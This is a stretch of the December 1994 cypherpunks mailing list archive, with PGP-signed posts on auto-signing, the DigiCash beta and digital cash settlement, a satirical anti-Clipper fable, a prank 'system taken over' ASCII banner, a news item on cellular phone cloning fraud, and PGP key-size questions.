bb.hks.net>, wrote: >The point is that if Eric insists on arbitrary rules that >threaten the list, some bright c'punk will "write code" to circumvent >the assinine rule. Use technology to solve problems... Not exactly; that's how the thought train began, but something that was just for circumventing the rule would have a slightly different solution: generate a new key for each post, sign with the key, and throw it away (so that no information would be contained in the signature). The signatures from the current system does contain some information. I might yet still implement something that does the above: at this point, it's pretty trivial, aside from hacking PGP to generate a key with a smaller than 384-bit modulus (to conserve computrons). As an aside, this is my general approach to things: I'll start off in a particular direction and then vary it as I think of new things. I only mention it here because I often state that I'm going to do something and then the result is somewhat different than my original summary. I've done this a couple times here, and I'm hoping that explaining this will make me appear, well, less flakey. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDOUioZzwIn1bdtAQGbjQF/R5vX8/XFc495w2V6xC6IhnPgR6hjGPh1 gxDqr/CM32axC7YJUmoaZOnHbnNvcvBs =L96u -----END PGP SIGNATURE----- From owner-cypherpunks at hks.net Sat Dec 3 12:04:58 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Sat, 3 Dec 94 12:04:58 PST Subject: Disclaimer within signed body? Message-ID: <199412032009.PAA09215@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412031833.KAA17387 at largo.remailer.net>, Eric Hughes wrote: >Now as far as aesthetics, this has got a lot of screenjunk in it. It >does, however, represent exactly what is going on in a way that the >right kind of MIME capable reader can make exact use of. > >I'm not advocating this. I do think, though, that a minimal solution >to all the criteria at once looks a lot like this. Somewhat, yes. As the aesthetics are important to me (which is why I avoid MIME as a rule), I'll avoid doing a MIME-compliant solution until MIME is integrated better with MUAs. Which in practice means that until it's part of emacs/vm, since that's what I use. I'm not currently concerned that the separation be computer-parsable, as long as it's human-parsable. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuDQgCoZzwIn1bdtAQF7ogGAtHI2XwHHZLKO3JqFwcGU3C9Uhjrgfd4j vS4DcKwlV/Ansmc2Z19IGwBQZpz6yctD =hcR5 -----END PGP SIGNATURE----- From alex at omaha.com Sat Dec 3 12:21:21 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 12:21:21 PST Subject: www-buyinfo list Message-ID: <199412032022.OAA01633@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- I'm sorry to broadcast this to the entire list, but I haven't been able to find the answer another way. Does anyone know how I can join the www-buyinfo list? == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuDTWBEpP7+baaPtAQHD2wP/XkgIbQdRvGmzphunIxo3QH4Ai5SmO5Ts ShPSU81D0/APaluL9Mjjbx4u9ZHrOfaa458nyL8JnSoTP09EERMl6IdXoZvn4SVr QuIVg+pjehn4fgJe9ZCDHJoQcOIVYIFyFixbryNJPpkC2mEEVb5dtOu9F54o8IBW q5XhqktmiBQ= =AB4O -----END PGP SIGNATURE----- From wfgodot at vespucci.iquest.com Sat Dec 3 12:50:08 1994 From: wfgodot at vespucci.iquest.com (Michael Pierson) Date: Sat, 3 Dec 94 12:50:08 PST Subject: Cypherpunk Commitment? [Was: We are ALL guests (except Eric)] Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Eric Hughes wrote: > ... It's comfortable to write manifestos, express your position, > be indignant at the government, and teach privacy. We generally live > in free societies where there is little recourse taken against speech. > It is must less comfortable to use tortious cryptography, run a > remailer, finesse export controls, and deploy code. Far and away the > most extreme reactions have come from what people did and not from > what they said. Speech affects the world, but action affects it more, > because every word that affects the world only through a sequence of > body motions. Cypherpunks get listened to not because we talk a lot; > that's insufficient. Cypherpunks get listened to because we do > things. I think you make a cogent point here. I agree that it is insufficient for cypherpunks to merely pay lip service to their ideals if they wish to see them prevail. Especially when those who want to build a Surveillance State Infrastructure into the National Information Infrastructure are busy writing legislation, cultivating their media assets, and cutting back room deals. I believe that John Philpot Curran's 18th century assertion that "It is the common fate of the indolent to see their rights become prey to the active." is true for cypherpunks today. The proponents of government mandated key escrow are certainly "doing something", and in the absence of an active and coordinated opposition, I think they will get their way, and that troubles me deeply. I doubt that they will wait long for the widespread use of seemlessly integrated OLE, OpenDoc compliant crypto tools to become a reality before they make their move. If these tools should arrive and come into widespread use in time to make a difference, it will be because the developers of these tools and those advocating their use were driven to take action by an awareness of the urgent sociopolitical imperatives involved, not the economic ones. I think most of us here appreciate what an insidiously malignant menace government mandated key escrow represents to the survival of our right to privacy and our liberty in general, both now, and even more so in the pervasively networked world we will inhabit in the 21st century. It is my deep conviction that the battle now brewing over the right of the people to freely use cryptography is of the most crucial consequence for the freedom that we, and our children, and our grandchildren will have in the next century and beyond. And it is a battle that will be lost if we don't commit our _deeds_ as well our words to the struggle. This is cause worth "doing something" about. This is a cause worth making sacrifices for. I thought cypherpunks were supposed to be part of the vanguard. If not us who? The unencumbered freedom to use cryptography to preserve our privacy will not prevail on its own; the forces arrayed against it are powerful and determined. If it prevails, it will be because we fought with greater determination, intelligence, and commitment, and were diligent in enlisting allies to our cause by convincing them it was a righteous one. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuCMnNGJlWF+GPx9AQEtFAQAyJDnJxlk9LcWZl0tjYdMQFs4jI5jPCJr yWBF6y0s4AONotRiwFg8E8leWLHTLKuZvTn92gBNXNC+CMWDn6XZjSuoJbygqmnJ xykHhezOHnn2GcFcSflduLSbBLj76Rpt8odR7uNJ6vDGO8kNRHi0rvV+siGMzKfD 90MfPW2r9sY= =k1vi -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 3 14:21:11 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 3 Dec 94 14:21:11 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412031953.NAA01538@omaha.omaha.com> Message-ID: <199412032319.PAA17722@largo.remailer.net> From: Alex Strasheim > Until the Digicash system can move real value, there is no > reason to use it. I think I'm missing something here. Isn't the Digicash system in a beta-phase? At this point, aren't they just trying to work out the kinks and show people that it works? Yes, it is granted that Digicash is in beta, and not polished. But beta testing usually happens after all significant functionality is present. The Digicash beta isn't moving real money, and that's a significant functional deficit. Obviously, a system that hasn't been deployed isn't as useful as one that has. This is substantially my point. DC and FV are not directly comparable, because one does something directly useful and the other doesn't. The question is, once Digicash is released for real, how will it compare to FV? Who can say? It hasn't been released for real. Clearing and settlement in a payments system are _most_ of the problem, not sugar coating. FV is leveraging Visa for settlement, but Digicash currently has nothing. Eric From nowhere at bsu-cs.bsu.edu Sat Dec 3 15:22:53 1994 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Sat, 3 Dec 94 15:22:53 PST Subject: No Subject Message-ID: <199412032322.SAA02084@bsu-cs.bsu.edu> Has anyone seen this before: 0h n0!@# Y0r SySteM hAz bEeN TAkeN 0veR bY k0mUTeR P1rAteS!@# _._ Y0 h0 h0 aNNa b0ttLe 0f rUm!@# / \ _____________ __/ L0CK! \__ / \ Avast, Ya SkUrvEE d0g!@# (_____________)| Arrr! I'm a | Yav bEEn b0ArDeD by tHe |\___// | | Pirate! | M0st r00tenEst, t00t1nezT | ||| O | / \_____________/ C0mpUtEr p1rAteZ tHat evER \ v / / d1D sAle thE s1l1k0n seA!@# \"/ Hay Sk0Tt!@ " H0wZ j1m d01ng?!?@# L egion ________________ 0 f LaRrY L0Ck |L0CK's G0al aNd | C 0dE SeZ: | Misshun!@#: | K ydz \||// /~~~~~~~\ |________________| [tHeSE / ! Oo | Ptttht! | | 2 B s0 El1tE | KarAkturz ---{ @ ()^() /\_______/ | ThAt 0ur HedZ | d0n't MeaN Sh1t.] \ # (U) | X-PL0De!@#$ | |________________| "Man...we're so lame, it hurts..." Th1z M0TD 1z MuCh beTTeR thAn tHe oNe thAt wAz up heRe B 4!@# GirLiee Usurz!? WaReZ the G1rl1e uZurz!? From jrochkin at cs.oberlin.edu Sat Dec 3 15:39:49 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sat, 3 Dec 94 15:39:49 PST Subject: Brands excluded from digicash beta Message-ID: At 6:19 PM 12/03/94, Eric Hughes wrote: > From: Alex Strasheim > > > Until the Digicash system can move real value, there is no > > reason to use it. > > I think I'm missing something here. Isn't the Digicash system in a > beta-phase? At this point, aren't they just trying to work out the kinks > and show people that it works? > >Yes, it is granted that Digicash is in beta, and not polished. But >beta testing usually happens after all significant functionality is >present. The Digicash beta isn't moving real money, and that's a >significant functional deficit. Huh? Beta testing occurs after significant functionality in the _software_ is present. The current digi-cash software, as I understand it, would work find in a real-cash situation. You would just need to pay for your ecash. Yeah, a system would need to be set up to deal with fraud and such, that might not be there right now. But that system is at an entirely different level then the digicash software, neither vendors nor buyers would have to deal with it. The fact that real money isn't being moved isn't a significant functional deficit in the digicash software, it's got nothing to do with the digicash software. It would be stupid to beta the software with real money, because then if it something doesn't work right, people will lose real money. You want to make sure that the software works pretty much flawlessly, so people don't lose real money once the system is being used for real money. And to do that, you release the beta software without real money. That makes perfect sense to me. Later, I'm sure, there will be a beta test using real money, once the software is completely finished. From anonymous-remailer at xs4all.nl Sat Dec 3 16:07:34 1994 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Sat, 3 Dec 94 16:07:34 PST Subject: pirate picture Message-ID: <199412040009.AA20579@xs1.xs4all.nl> Damn, those philosphy department doctoral candidates from Columbia are at it again. > Has anyone seen this before: > > > > 0h n0!@# Y0r SySteM hAz bEeN > TAkeN 0veR bY k0mUTeR P1rAteS!@# > _._ Y0 h0 h0 aNNa b0ttLe 0f rUm!@# > / \ _____________ > __/ L0CK! \__ / \ Avast, Ya SkUrvEE d0g!@# > (_____________)| Arrr! I'm a | Yav bEEn b0ArDeD by tHe > |\___// | | Pirate! | M0st r00tenEst, t00t1nezT > | ||| O | / \_____________/ C0mpUtEr p1rAteZ tHat evER > \ v / / d1D sAle thE s1l1k0n seA!@# > \"/ Hay Sk0Tt!@ > " H0wZ j1m d01ng?!?@# L egion > ________________ 0 f LaRrY L0Ck > |L0CK's G0al aNd | C 0dE SeZ: > | Misshun!@#: | K ydz \||// /~~~~~~~\ > |________________| [tHeSE / ! Oo | Ptttht! | > | 2 B s0 El1tE | KarAkturz ---{ @ ()^() /\_______/ > | ThAt 0ur HedZ | d0n't MeaN Sh1t.] \ # (U) > | X-PL0De!@#$ | > |________________| "Man...we're so lame, it hurts..." > > Th1z M0TD 1z MuCh beTTeR thAn tHe oNe thAt wAz up heRe B 4!@# > > GirLiee Usurz!? WaReZ the G1rl1e uZurz!? From matthewn at uiuc.edu Sat Dec 3 16:10:49 1994 From: matthewn at uiuc.edu (TheElusiveMatthew) Date: Sat, 3 Dec 94 16:10:49 PST Subject: How do *I* use PGP? In-Reply-To: Message-ID: On Sat, 3 Dec 1994, Bob Snyder wrote: > At 5:30 PM 12/1/94, TheElusiveMatthew wrote: > > >My internet access is through a personal account provided by my employer. > >It is on a machine used exclusively by employees of the University of > >Illinois (no student accounts). > > What kind of machine is it? How do you read mail? A PC mail reader? I read my mail with pine on my account. I think the login excerpt below answers your other question. ----------------- UofI CCSO - Sequent S81 (ux1.cso.uiuc.edu - ttyt9) 4.2+ BSD/5.3 UNIX - Dynix 3.1.2 ----------------- TheElusiveMatthew From usura at xs4all.nl Sat Dec 3 16:12:25 1994 From: usura at xs4all.nl (Alex de Joode) Date: Sat, 3 Dec 94 16:12:25 PST Subject: ecash trial issues explained Message-ID: <199412040013.AA21097@xs1.xs4all.nl> : There is a sort of (limited) Freenet system in Holland called DDS, : people can request an account, (wich usually takes 48 hours), if youre : - -really- want ECash fast, get an Dutch-English dictionary and type: : telnet dds.nl : You will then have a WWW-like page: choose * dutch (english translation) (position) * ga de stad binnen (enter the city) (1) * aanmelden als DDS bewoner (apply for account) (14) voornaam (first name) achternaam (last name) adres (adress) postcode (zipcode) stad (city) land (county) (just backspace NEDERLAND) tel overdag (day time telephone) tel 's avonds (evening telephone) (ie 020-6 555 123) toegangsnaam (login) (max 8 characters) password (password) Then choose "lever aanvraag in" (submit) and in approx 48 hours you'll have an Dutch -same timezone as DigiCash- account. One of the limitations of the DDS is that mail only can be send to adresses that are in the .nl domain, so you cannot forward your mail. For reading your mail choose: * ga de stad binnen (enter the city) * postkantoor (postoffice) * lees/schrijf email {Pine} (use email facilities) in Pine choose "L postvakken" and then "Inkomend" (incoming) The status line of Pine has been translated into Dutch: ? help | M hoofd |P vorig |- vorg bl |d verwijd |r antw O overig| V bekijk|N volge |spc volg bl|u herstel |f doors ? help | M main |P prev |- last page |d delete |r reply O other | V View |N next |spc next pag|u undelet|f forward Hope this helps, if you have any problems/questions please email me. -- Exit! Stage Left. Alex de Joode From speed at cs.washington.edu Sat Dec 3 16:38:27 1994 From: speed at cs.washington.edu (Erik Selberg) Date: Sat, 3 Dec 94 16:38:27 PST Subject: free nntp servers Message-ID: <199412040038.QAA20835@meitner.cs.washington.edu> (apologies if this is as inciteful to asking for ftp servers on alt.sex) Are there any good free nntp servers (preferably US) that carry most/all of the alt groups and some of the regional (ba, pa) groups as well? Thanks, -Erik work: (206) 543-7798 Erik Selberg play: (206) 517-3039 speed at cs.washington.edu I get by with a little help from my friends... From rfb at lehman.com Sat Dec 3 18:11:33 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Sat, 3 Dec 94 18:11:33 PST Subject: Mighty morphing power cypherpunks In-Reply-To: <199412030113.RAA27075@netcom8.netcom.com> Message-ID: <9412040211.AA02600@cfdevx1.lehman.com> From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 1994 17:13:28 -0800 (PST) My point was that if some of the autonag messages go astray, or are deliberately misled, who cares? I suspect that LD would love to play around with this feature. Spoof a letter from someone and you can make the cypherpunks send that person some hate mail. Basically, I just think it's a mistake. I think that annotating a message as it passes through cypherpunks -- such as cypherpunks at hks.net does -- is a fine idea. However, I think that adding new ways for attackers to make privacy advocates look bad isn't a great idea. The proposed system is for everyone, not just pseudonyms. If I meant pseudonyms, I would have said pseudonyms, not nyms. I understood that and followed the same convention. I'm not worried about pseudonyms -- they land in the bit bucket somewhere. I'm more concerned about spoofed real addresses. Rick From lmccarth at freya.cs.umass.edu Sat Dec 3 18:13:52 1994 From: lmccarth at freya.cs.umass.edu (lmccarth at freya.cs.umass.edu) Date: Sat, 3 Dec 94 18:13:52 PST Subject: The Emperor's New Brain (fwd) Message-ID: <199412040218.VAA12370@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Sincere apologies if someone's sent this to the list before.... Forwarded message: > This comes to you courtesy of Del's friend Joe Levy: > > Would you all mind distributing this as much as possible? I, and every > net-surfer who is concerned about her/his rights, are trying to stop Big > Brother from taking over, and need all the help we can get. There may be more > serious letters later on. For now, just enjoy a slightly ridiculous one. All > the best, and don't get struck by flying pygmies, as always. > Forever, > Joe > > > The Emperor's New Brain > by Blimix (Joe Levy) > > (With apologies to Hans Christian Anderson.) > > Once upon a time, there was an Emperor. He had been voted > into office fairly easily, because he had managed to impress people > with his brain. But once he realized that the job demanded more, > he said, "My brain is too small!" So he had posters hung on every > blank wall in the kingdom, proclaiming the need for skilled neural > surgeons/tailors to weave him a new, better, bigger brain. "Soon," > he thought, "I will have a good brain and will be able to govern my > empire properly, and all the people will love me, and I'll be so > cool that there'll be chicks hanging around me all the time... > Maybe I'll even get a car, or put up the bestest BBS in the > world..." and so on. What he didn't know what that he was saying > all of this out loud, and that a small band of rogues had been > shadowing him for the duration of his monologue. When the Emperor > had left to pursue other activities, due to the rather self- > exciting nature of his mostly derailed train of thought, the rogues > spoke amongst themselves. > "Will you listen to that, mate?" commented NSA. "The poor > chap really hasn't got a clue!" > "Yeah, let's put him out of our misery," remarked FBI. > "Be quiet, will you?" said CIA. "You dolt, don't you see the > prospects here? We can rule this place. NSA and NIST have the > plan. Where is NIST, anyway?" > "He'll be along, shortly. He had some business with that > hotshot DES. Chopped half of DES's - thing - off, he did. Ugly > business," replied NSA. > > * * * > > "Sire, there are some important-looking men to see you," said > the page. > The Emperor jumped. "What?!? Oh! Okay, I'll be down > shortly. Um, you didn't... see anything... did you?" > "No, Sire," the page replied immediately. > The Emperor left to wash his hand. > > * * * > > "You mean you can weave a tremendous brain for me if I just > bring you all the doors, window blinds and roofs in the kingdom, > using your Clippers?" > "Yeah, but there's also the matter of payment," said CIA. > NSA spoke. "We understand that you have, in the castle > vaults, a supply of magical potions of growth. Those will do > nicely." > "But those are the only ones in the kingdom! We have saved > them since the days of my great-great-great-great-grandmother, > what's-her-name!" > FBI stood to his full, rather impressive height, and looked > down at the suddenly small-feeling Emperor. "This is what's best > for the kingdom, isn't it? You need a brain, and we need the > potions. Do you really want to argue?" > "Uh... of course not." was the meek response. > "Good. Now that that's settled-" began NSA. > "But what if the peasants want to keep their roofs and doors > and blinds?" interrupted the Emperor. > NSA confidently replied, "They won't. We'll make sure that > they know it's all for the common good. Besides, those things are > only needed to conceal things. People who have nothing to hide > have no cause to resent this, do they? Besides, if against all > likelihood, our idea is rejected by the public, we can simply put > everything that we took away back again. And don't think for a > moment that we would be looking into the houses of innocents. No, > we can help you take care of your subjects. They will look up to > us as kindly Big Brothers." > "I'm quite capable of taking care of the kingdom myself," > asserted the Emperor. > "Nonsense," CIA remarked. "We're the ones building you this > brain, right?" > "Right," the Emperor acquiesced, though he wasn't quite sure > that the conclusion followed logically from this. He felt there > was something slightly wrong, but since he could not tell what, he > decided not to risk making a fool of himself. > "Then we can begin!" roared FBI. > > * * * > > At the scoundrels' insistence, the Emperor ordered every > construction worker in the kingdom to work on the dismantling of > the houses, using their new Clippers. Thus did the infrastructure > suffer, as roads crumbled, and prices rose, while the economy began > a slow but accelerating collapse. Just inside the castle, a ragged > collection of peasants met with the Emperor. > "Why are your goons doing this to us?" cried one woman. "I > can't get to work anymore!" > And old man spoke up. "Without a roof, we can't keep the > rains off of us! My whole family has pneumonia!" Several others > shouted their agreement. > "I was willing to sacrifice for the kingdom," lamented a > former merchant. "I willingly gave them all of my wood, and put up > paper instead. They ripped it down! And they didn't even use it! > They just said I couldn't have anything covering me." > "I'm sure there are perfectly reasonable explanations for all > of this." > Suddenly four towering figures entered, and herded the > peasants outside. "There's no such thing as rain! Stop > complaining!" A few families were trampled during the confusion, > but no one noticed. > > * * * > > It was only a week later that the smoke was first seen. > Behind the castle, the tremendous stockpiles of collected wood were > being burned. > "My kingdom is collapsing!" cried the Emperor. > "And we know why!" exclaimed FBI. "There are secret societies > of witches that oppose us. But our spies, KGB and Mccarthy, have > been rooting them out. That is what the fires are for." > "But you're burning the wood that you said you would save!" > "SO WHAT?!?!?!?" > "Okay, as long as you put it that way. What about my brain?" > This caught FBI by surprise, for he had completely forgotten > about the deal. Luckily, CIA happened to be in the room, and > glibly replied, "The chemical reactions going on right now are the > final processes in the construction of the brain." > "Oh, goody." The prospect of the new brain cheered up the > Emperor, and he forgot about his dying kingdom. > > * * * > > Witch-burnings were becoming common. The rogues, now grown to > immense size, regularly reached into houses, plucking out the > occupants, and placed them on the huge bonfires. The first ones > taken, of course, were the poor peasants who had originally spoken > up. Then, anyone who had a brain was considered a potential > threat, and made into a scapegoat. > "What did this woman do that makes you believe she's a witch?" > the Emperor asked. > FBI replied, "She turned me into a n-" > "Shut up," said NSA. "We discovered a rumor about strange > activities going on in her house. We checked it out, and surely > enough, we found this." He triumphantly held up a rather well- > executed painting of a swan launching itself into flight from an > alpine lake. > "What is its relevance to witchcraft?" > NSA began, "First, the canvas can be used to shield her from > sight, so she obviously has something to hide. Also, the drawing > itself is obviously a dangerous example of freedom propaganda. As > we all know, freedom cannot be tolerated. We also intercepted this > letter from her to her band. It proves that she and the twenty > other people named here are witches." > Working her mouth free of the gag, the woman cried, "I didn't > write that! It's not even in my hand-" FBI cut off her protest by > flinging her into the blazing conflagration. > > * * * > > NSA congratulated his friends. "Well, lads, we've made a > killing. Besides having the power to do whatever we want to > whomever we want, our Clippers are selling like wildfire, since > they're the only product that anyone is allowed to buy now. Can > you believe we actually managed to convince people that those > things are useful?" They all laughed heartily at this. "It's > probably time to invite the Emperor back into the castle." > At their call, his Excellency dutifully entered. "We finished > your brain last night, and implanted it while you were sleeping in > the stables," claimed CIA. "It is indeed huge, and, being made > from pure energy (released by the burning wood), weighs virtually > nothing. We fashioned it in such a way that only a person without > personal problems can see it, so that you may judge this > characteristic in people with ease." > FBI held up a mirror to facilitate the Emperor's viewing of > his new brain. "How do you like it?" > Though he saw nothing but his own reflection, he said, "It is > a good brain. I like the laurels particularly. Let's hold a > parade, so that all may see The Emperor's New Brain!" > > * * * > > And so it was. The day came, and the broken people trudged > through the pitted streets to finally view the great result of > their even greater sacrifice. As they waited expectantly for the > parade train, they wondered, "Was the loss of our privacy and > freedom of thought worth a slightly more effective government?" > But they could do nothing more than wonder, for to speak thusly > would mean certain death. So, they mutely held their only > possessions, the Clippers, which had been the instruments of their > downfall. > A wave of excitement swept through the crowd, as the arrival > of the parade was heralded. All knew of the wondrous properties > that the Brain possessed, and were eager to see it for themselves. > As the crowd held its breath, the Emperor came into view. And no > one was surprised that they could not see the brain, because they > knew perfectly well that they had problems. But this could not be > admitted. Words of praise floated through the air. "How regal it > is!" "That brain is huge!" "I like the color scheme." "Now he'll > be able to solve all of our problems." > "That brain doesn't exist," said a junior programmer. > "Well, neither do we," said a philosopher. > "No, I mean it! There's no brain there!" the programmer > insisted. And gradually, the crowd became aware of the truth of > his words. > "The Emperor doesn't have a brain!" they all shouted. They > picked up fragments of concrete that had once been a sidewalk, and > started throwing them. Luckily for the Emperor, this behavior was > quelled when FBI stepped on the offending parties. > The survivors were too weak, due to lack of protection from > the elements, to fight back. And while the all-powerful villains > lived comfortably for the rest of their lives, a nation died. > > * * * * * * * * * * * * * * * * * * * * * > > "They that can give up essential liberty to obtain a little > temporary safety deserve neither liberty nor safety." - Benjamin > Franklin > > Don't let Clipper be YOUR downfall. Learn as much as you can, > than do whatever you can to educate others, and let your > representatives and senators know how you feel. Wired is a good > source of information. Read the April issue. Or gopher to > wired.com to see their database. Lazarus Long and I will be > putting up Clipper-dedicated databases of our own. (More > information to follow.) > > Y Gwir Yn Erbyn Byd, > Blimix > jl0637 at rachel.albany.edu > > p.s. Please feel free to distribute this story at will. I merely > ask that you do not change or delete any part of it, from the title > line to this post-script. > - -- > Adam Lindsey Jacobs | "Thinking is the hardest work > bullfrog at jaflrn.morse.net | there is, which is probably the > Long Island, New York, U.S.A. | reason why so few engage in it." - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuEm6SoZzwIn1bdtAQGeiwGAjvh39y5hWN9+zNUVHGz8W2KHkVIYsdvR MSzDCX+lV4LRH2gc0c5IXp9CypYJke8h =U7j5 -----END PGP SIGNATURE----- From alex at omaha.com Sat Dec 3 18:23:47 1994 From: alex at omaha.com (Alex Strasheim) Date: Sat, 3 Dec 94 18:23:47 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412040154.TAA00186@omaha.omaha.com> Message-ID: <199412040223.UAA00225@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > Yes, it is granted that Digicash is in beta, and not polished. But > beta testing usually happens after all significant functionality is > present. The Digicash beta isn't moving real money, and that's a > significant functional deficit. Couldn't we make a similar argument against digital commerce systems in general? Most of the things I want to buy aren't available online, so what good are net based transactions? In a sense that's true, but at the same time it seems clear that eventually one or more systems with goods and services I want to buy (at prices I want to pay) will emerge. If I didn't believe that, I wouldn't be very interested in the topic. Unless Digicash has significant problems with banks or governments that I don't know about (always a possibility), the things I've heard about the beta test make me believe that a functional transaction system from that company will probably be released. > Who can say? It hasn't been released for real. Clearing and > settlement in a payments system are _most_ of the problem, not sugar > coating. FV is leveraging Visa for settlement, but Digicash currently > has nothing. I can understand why you'd need Visa's permission if you're going to be using a system that uses that credit card to process transactions. But if DigiCash feels their system is secure, what would stop them from just selling digital currency on their own? They could say that they'll sell e-dollars for $1, and buy them for $0.95. Assuming they keep the revenue from currency sales in something low risk and they committ to making a market, wouldn't that be enough to get things rolling? Individuals or banks all over the world could set up operations which convert e-currency to and from $US, working inside of the buy/sell spread set up by Digicash. On top of that, they'd get the interest income on the funds that back all the digital dollars, which would be a large source of income in addition to what they would make from the software. If there's someone I can go to who will give me cash for digital currency, I'll take digital currency as a payment for any goods and services I sell. If someone else will give me a check for the digicash, what does my banker have to say about it? == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuEn4REpP7+baaPtAQGSbwP/ccN3dvugcEgFg9lG6DuFw2JzdltDd63C 5ZkMiDMkbWly3i0d+TI5OGTFPoafjDaBRieaoCzsrjsZAWQDVrscjwrvCa38GQDD aTZa3AF9pEixhVWN0pFiDcUx7ByO92fFexA6POHnZOvTSNws9wqQ4b1vnaofWQNE k4s0ji7x3NE= =+8TT -----END PGP SIGNATURE----- From jya at pipeline.com Sat Dec 3 18:47:25 1994 From: jya at pipeline.com (John Young) Date: Sat, 3 Dec 94 18:47:25 PST Subject: NYT on Insecure Phones Message-ID: <199412040246.VAA25360@pipe3.pipeline.com> -----BEGIN PGP SIGNED MESSAGE----- The New York Times last Thursday had two pieces on telephones that may be of interest. One deals with cellular fraud in NYC, given entirely here: "Cellular Fraud in New York Cellular telephone fraud in New York City has become so rampant that a cellular service in Washington will temporarily block its customers from using their wireless phones when they travel in New York. Cellular One of Washington-Baltimore, owned by SBC Communications Inc., has sent its customers letters notifying them that it would block the service beginning on Thursday because it had compiled a huge backlog of phone numbers used in New York that appeared to be fraudulent. Company officials said they would resume service once they finished investigating each case, which they said would take three weeks. Cellular telephone fraud occurs when people use false identification numbers on their wireless telephones and make calls. The Cellular Telecommunications Industry Association said fraud costs had soared to about $1 billion a year. Cellular thieves typically use radio scanners to capture the identification numbers of legitimate cellular phones, which transmit the numbers each time they are used. These numbers are then written onto a computer chip inside an inactive phone, effectively 'cloning' the original." ------------------- End illegitimate fraud article Then, probably not coincidentally in this happy legitimate-fraud shopping season, there was a long consumer-oriented article the very same day, alors, about new cordless phones, including this info about security features against illegitimate fraud: "A new generation of digital cordless phones using a powerful 900 megahertz (MHz) frequency ... blocks thieves who scan the airwaves listening for credit card and Social Security numbers people innocently give over the phone. ... Cellular car phones and two-way radio car service conversations were constant unwanted companions with the standard cordless phones [but] with the 900 MHz phones, the interference was practically non-existent. ... The Cincinnati Microwave Escort 9020 Digital Spread Spectrum Cordless Telephone is one of the first models to feature spread-spectrum technology -- originally developed for the military and now being used for consumers -- that digitally scrambles voice communications before transmitting them. ... ... newer standard-frequency models are offering improved security. By using scrambling technology -- though not as sophisticated as digital spread spectrum -- they block out most eavesdroppers. Panasonic calls the feature Secure Guard; Motorola, Secure Clear, and Toshiba, Call Protect. It doesn't add much to the cost ($10 to $25) and is well worth the money, although the phone is not as secure as a digital one." [My first PGP sig, hooray] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuECi4Sb9hQ07hCVAQHhEQQAjzA4HuMxdExsQiHz2T22MpD8Qe6OqjCG CILxx10lXlqYU9/4xtruZuKNd4dHqzKIqsFhLD1IdIHOwplCzigPW5LIs7HKJAJ8 NpfE/lJ3y/ASgk5P21ZPEFHFgzt0voIRIMlrURIgD07kh35XqfaKZ21Jq7yUCfnh g8eLZ8RkgG0= =qYtN -----END PGP SIGNATURE----- From werewolf at io.org Sat Dec 3 19:26:01 1994 From: werewolf at io.org (Mark Terka) Date: Sat, 3 Dec 94 19:26:01 PST Subject: Date for 2048 bit Keys?? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will handle key sizes of up to 2048 bits. Someone speculated that it will take effect in the middle of the month (ie after Dec. 15 you type pgp -kg and it will give you four choices, the last one of up to 2048 bits). I wasn't aware that this feature was programmed into this version of PGP. I always thought that there was simply going to be another upgrade that would allow the larger key sizes. Can anyone shed some light on this??? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuEzya+YbMzawbu5AQE/aQP8CU/02O4PoXEWBrHFIMNc80BJS9tp0PC2 ZrWXEJt20QEzE9d8BvO6LhlfcoC5/aYgtp73BsfHnl6favzqp64K+9R8LaHb+P5v 8NipeLi37bdtoZpNG6/0F/WrXABZir9Z22+HHsI3DWuxZtiKRlfl9QAdxl2sss0I N1tCc05dU3U= =LIkh -----END PGP SIGNATURE----- From VAMAGUS at delphi.com Sat Dec 3 20:14:15 1994 From: VAMAGUS at delphi.com (VAMAGUS at delphi.com) Date: Sat, 3 Dec 94 20:14:15 PST Subject: Date for 2048 bit Keys?? Message-ID: <01HK82Z3V1IQ99EBA0@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- werewolf at io.org wrote: >I saw an interesting thread in alt.security.pgp about when PGP v 2.6.2 will >handle key sizes of up to 2048 bits. Someone speculated that it will take >effect in the middle of the month (ie after Dec. 15 you type pgp -kg and >it will give you four choices, the last one of up to 2048 